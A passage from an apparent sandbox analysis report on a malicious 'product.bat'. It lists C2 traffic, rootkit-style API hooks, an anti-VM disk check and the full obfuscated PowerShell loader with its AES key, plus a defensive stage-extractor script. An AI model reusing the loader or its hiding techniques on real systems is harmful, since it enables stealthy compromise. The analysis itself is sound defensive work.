Dec 13, 2024 13:33:11.981216908 CET | 49883 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:33:12.100771904 CET | 4988 | 49883 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:33:12.100831985 CET | 4988 | 49883 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:34:14.353902102 CET | 49892 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:34:14.474275112 CET | 4988 | 49892 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:34:14.474529028 CET | 49892 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:34:17.154525042 CET | 4988 | 49892 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:34:17.159332037 CET | 49892 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:34:19.669526100 CET | 49892 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:34:19.670022964 CET | 49892 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:34:19.790824890 CET | 4988 | 49892 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:34:19.791043997 CET | 4988 | 49892 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:34:28.998346090 CET | 49893 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:34:29.119246960 CET | 4988 | 49893 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:34:29.119363070 CET | 49893 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:34:29.119889021 CET | 49893 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:34:29.239706039 CET | 4988 | 49893 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:34:31.845710993 CET | 4988 | 49893 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:34:31.845777035 CET | 49893 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:34:56.855470896 CET | 49893 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:34:56.975264072 CET | 4988 | 49893 | 103.230.121.81 | 192.168.2.7
Dec 13, 2024 13:35:07.654098034 CET | 49893 | 4988 | 192.168.2.7 | 103.230.121.81
Dec 13, 2024 13:35:07.773895025 CET | 4988 | 49893 | 103.230.121.81 | 192.168.2.7

UDP traffic (DNS, port 53):

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 13, 2024 13:31:44.759985924 CET | 55296 | 53 | 192.168.2.7 | 1.1.1.1
Dec 13, 2024 13:31:44.899945021 CET | 53 | 55296 | 1.1.1.1 | 192.168.2.7
Dec 13, 2024 13:32:22.974303961 CET | 49410 | 53 | 192.168.2.7 | 1.1.1.1
Dec 13, 2024 13:32:23.349615097 CET | 53 | 49410 | 1.1.1.1 | 192.168.2.7

DNS queries:

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 13, 2024 13:31:44.759985924 CET | 192.168.2.7 | 1.1.1.1 | 0xb98e | Standard query (0) | iam.nigga.dad | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:32:22.974303961 CET | 192.168.2.7 | 1.1.1.1 | 0x4772 | Standard query (0) | iam.nigga.dad | A (IP address) | IN (0x0001) | false

DNS answers (the bg.microsoft.map.fastly.net entries are a Microsoft CDN hostname and precede the sample's first query):

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 13, 2024 13:31:27.826252937 CET | 1.1.1.1 | 192.168.2.7 | 0x27d9 | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:31:27.826252937 CET | 1.1.1.1 | 192.168.2.7 | 0x27d9 | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:31:42.525688887 CET | 1.1.1.1 | 192.168.2.7 | 0xca7e | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:31:42.525688887 CET | 1.1.1.1 | 192.168.2.7 | 0xca7e | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:31:44.899945021 CET | 1.1.1.1 | 192.168.2.7 | 0xb98e | No error (0) | iam.nigga.dad | - | 103.230.121.81 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 13:32:23.349615097 CET | 1.1.1.1 | 192.168.2.7 | 0x4772 | No error (0) | iam.nigga.dad | - | 103.230.121.81 | A (IP address) | IN (0x0001) | false

                                                Code Manipulations

Function Name | Hook Type | Active in Processes
ZwEnumerateKey | INLINE | explorer.exe, winlogon.exe
NtQuerySystemInformation | INLINE | explorer.exe, winlogon.exe
ZwResumeThread | INLINE | explorer.exe, winlogon.exe
NtDeviceIoControlFile | INLINE | explorer.exe, winlogon.exe
ZwDeviceIoControlFile | INLINE | explorer.exe, winlogon.exe
NtEnumerateKey | INLINE | explorer.exe, winlogon.exe
NtQueryDirectoryFile | INLINE | explorer.exe, winlogon.exe
ZwEnumerateValueKey | INLINE | explorer.exe, winlogon.exe
ZwQuerySystemInformation | INLINE | explorer.exe, winlogon.exe
NtResumeThread | INLINE | explorer.exe, winlogon.exe
RtlGetNativeSystemInformation | INLINE | explorer.exe, winlogon.exe
NtQueryDirectoryFileEx | INLINE | explorer.exe, winlogon.exe
NtEnumerateValueKey | INLINE | explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx | INLINE | explorer.exe, winlogon.exe
ZwQueryDirectoryFile | INLINE | explorer.exe, winlogon.exe

Every patched prologue starts with 0xE9, the x86-64 near JMP rel32 opcode, so the first five bytes of each function are replaced by a relative jump into the injected code (the four bytes after 0xE9 are the little-endian displacement; the report lists the first six bytes written). Nt*/Zw* pairs show identical bytes because in user-mode ntdll.dll both names export the same stub; NtQuerySystemInformation, ZwQuerySystemInformation and RtlGetNativeSystemInformation likewise share one displacement. The hooked set corresponds to the "Hooks ... query functions" signatures at the top of the report: directory enumeration (NtQueryDirectoryFile/Ex) for hiding files, key and value enumeration for hiding registry entries, and NtQuerySystemInformation for hiding processes. NtResumeThread and NtDeviceIoControlFile are hooked as well; the report assigns no purpose to those two.

Function Name | Hook Type | New Data
ZwEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Function Name | Hook Type | New Data
ZwEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF


                                                Target ID:6
                                                Start time:07:31:07
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\product.bat" "
                                                Imagebase:0x7ff77aae0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:7
                                                Start time:07:31:07
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:07:31:08
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                Wow64 process (32bit):false
                                                Commandline:wmic diskdrive get Model
                                                Imagebase:0x7ff7fa7f0000
                                                File size:576'000 bytes
                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:07:31:08
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\findstr.exe
                                                Wow64 process (32bit):false
                                                Commandline:findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"
                                                Imagebase:0x7ff6904f0000
                                                File size:36'352 bytes
                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:11
                                                Start time:07:31:10
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
Commandline:cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Users\user\Desktop\product.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] (''));
                                                Imagebase:0x7ff77aae0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true
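
The command line of Target ID 11 is the whole loader: it reads product.bat back in, takes the first line that starts with 'iecMs', splits the remainder on '\', undoes a small alphabet substitution ('#' stands for '/', '@' for 'A'), base64-decodes each piece, decrypts it with AES-256-CBC/PKCS7 under the hard-coded key and IV, gunzips the result and passes it to [System.Reflection.Assembly]::Load, invoking the EntryPoint of each of the three stages (the third one with an empty string[] argument). The Invoke-Expression/'*'-stripping only exists to split class names so the script does not contain them as literals. The PowerShell below is an added static extractor written for this report, not code from the sample or from Joe Sandbox: it runs the same decode chain but writes each recovered stage to disk and hashes it instead of loading it. The key and IV are the ones in the command line; the output directory, the stageN file names and the MZ-header check are this editor's choices.

```powershell
# Added static extractor for the product.bat loader in this report (editor's code,
# not the sample's). Mirrors the loader's decode chain, but never calls Assembly.Load.
param(
    [Parameter(Mandatory = $true)][string]$BatPath,
    # Assumption: stages are written next to the .bat unless told otherwise.
    [string]$OutDir = (Join-Path (Split-Path -Parent $BatPath) 'extracted')
)

# Key (32 bytes) and IV (16 bytes) exactly as they appear in the loader command line.
$Key = [Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA=')
$IV  = [Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q==')

function Unprotect-AesCbc([byte[]]$Data) {
    # Same parameters as the sample's vhVnA: AES/CBC/PKCS7 with a fixed key and IV.
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key = $Key
        $aes.IV  = $IV
        $dec = $aes.CreateDecryptor()
        try {
            $plain = $dec.TransformFinalBlock($Data, 0, $Data.Length)
            return ,$plain   # keep the byte[] intact instead of streaming bytes
        } finally { $dec.Dispose() }
    } finally { $aes.Dispose() }
}

function Expand-GzipBytes([byte[]]$Data) {
    # Same as the sample's FpYMp, minus the Invoke-Expression string games.
    $in  = New-Object System.IO.MemoryStream(,$Data)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [System.IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($out) } finally { $gz.Dispose(); $in.Dispose() }
    $bytes = $out.ToArray()
    $out.Dispose()
    return ,$bytes
}

# The loader scans its own file for the first line beginning with 'iecMs' and
# treats the rest of that line as '\'-separated payload blobs.
$marker = 'iecMs'
$line = Get-Content -LiteralPath $BatPath | Where-Object { $_.StartsWith($marker) } | Select-Object -First 1
if (-not $line) { throw "No line starting with '$marker' found in $BatPath" }

$null   = New-Item -ItemType Directory -Force -Path $OutDir
$OutDir = (Resolve-Path -LiteralPath $OutDir).Path
$sha256 = [System.Security.Cryptography.SHA256]::Create()

$parts = $line.Substring($marker.Length).Split('\')
for ($i = 0; $i -lt $parts.Count; $i++) {
    # Undo the loader's alphabet tweak before standard base64 decoding.
    $b64   = $parts[$i].Replace('#', '/').Replace('@', 'A')
    $plain = Expand-GzipBytes (Unprotect-AesCbc ([Convert]::FromBase64String($b64)))

    # Each blob is handed to Assembly.Load by the loader, so a PE ('MZ') header is expected.
    $isPe = ($plain.Length -ge 2 -and $plain[0] -eq 0x4D -and $plain[1] -eq 0x5A)
    $path = Join-Path $OutDir ('stage{0}.{1}' -f $i, $(if ($isPe) { 'bin' } else { 'dat' }))
    [System.IO.File]::WriteAllBytes($path, $plain)

    $hash = ([BitConverter]::ToString($sha256.ComputeHash($plain))).Replace('-', '').ToLower()
    '{0}: {1} bytes, MZ header: {2}, SHA256 {3}' -f $path, $plain.Length, $isPe, $hash
}
```

Run it in an isolated analysis VM as `.\Extract-ProductBat.ps1 -BatPath C:\Users\user\Desktop\product.bat` (the script name is this editor's; the path is the one the loader hard-codes). Three stage files should come out, matching the loader's $STi, $JnT and $UpD, and their SHA256 values can be compared against the dropped-file hashes elsewhere in the report. If a blob fails with a padding or base64 error, the line was modified after encryption (for example by a text editor normalising line endings); the substitution step is applied per blob, so a single corrupted blob does not stop the others.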

                                                Target ID:12
                                                Start time:07:31:10
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell.exe -WindowStyle Hidden
                                                Imagebase:0x7ff741d30000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:14
                                                Start time:07:31:21
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\dllhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\dllhost.exe /Processid:{372c9116-8a11-4207-941c-c83db9f8d8a2}
                                                Imagebase:0x7ff7d8730000
                                                File size:21'312 bytes
                                                MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:15
                                                Start time:07:31:21
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\winlogon.exe
                                                Wow64 process (32bit):false
                                                Commandline:winlogon.exe
                                                Imagebase:0x7ff6fc1b0000
                                                File size:906'240 bytes
                                                MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:16
                                                Start time:07:31:22
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\lsass.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\lsass.exe
                                                Imagebase:0x7ff6d9390000
                                                File size:59'456 bytes
                                                MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:17
                                                Start time:07:31:22
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:18
                                                Start time:07:31:22
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\dwm.exe
                                                Wow64 process (32bit):false
                                                Commandline:"dwm.exe"
                                                Imagebase:0x7ff74b010000
                                                File size:94'720 bytes
                                                MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:19
                                                Start time:07:31:22
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\product.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
                                                Imagebase:0x7ff77aae0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:20
                                                Start time:07:31:22
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:22
                                                Start time:07:31:26
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                                Imagebase:0x7ff77aae0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:23
                                                Start time:07:31:26
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:24
                                                Start time:07:31:26
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                Wow64 process (32bit):false
                                                Commandline:wmic diskdrive get Model
                                                Imagebase:0x7ff7fa7f0000
                                                File size:576'000 bytes
                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:25
                                                Start time:07:31:26
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\findstr.exe
                                                Wow64 process (32bit):false
                                                Commandline:findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"
                                                Imagebase:0x7ff6904f0000
                                                File size:36'352 bytes
                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:26
                                                Start time:08:46:25
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:27
                                                Start time:08:46:27
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:28
                                                Start time:08:46:28
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:29
                                                Start time:08:46:28
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:30
                                                Start time:08:46:29
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:31
                                                Start time:08:46:30
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:32
                                                Start time:08:46:30
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:33
                                                Start time:08:46:31
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                Imagebase:0x7ff7b4ee0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:34
                                                Start time:08:46:31
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
